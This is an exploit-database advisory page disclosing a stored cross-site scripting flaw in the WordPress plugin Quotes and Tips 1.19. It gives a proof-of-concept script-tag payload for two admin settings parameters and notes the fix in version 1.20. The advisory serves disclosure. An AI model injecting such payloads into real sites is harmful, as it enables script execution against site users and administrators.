[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Quotes And Tips 1.19 Cross Site Scripting Vulnerability

Author
Madhu Akula
Risk
[
Security Risk Low
]
0day-ID
0day-ID-24749
Category
web applications
Date add
18-12-2015
Platform
php
WordPress Quotes And Tips 1.19 Cross Site Scripting Vulnerability

Plugin Name : Quotes and Tips
 
Effected Version : 1.19 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following fields put the payload as below
 
http://localhost/wp-admin/admin.php?page=quotes-and-tips.php
 
qtsndtps_tip_label = “><script>alert(1)</script>
qtsndtps_quote_label = “><script>alert(2)</script>
Vulnerable Parameter : qtsndtps_tip_label, qtsndtps_quote_label
 
Type of XSS : Stored
 
Fixed in : 1.20
 
http://wordpress.org/plugins/quotes-and-tips/changelog/



#  0day.today [2024-12-25]  #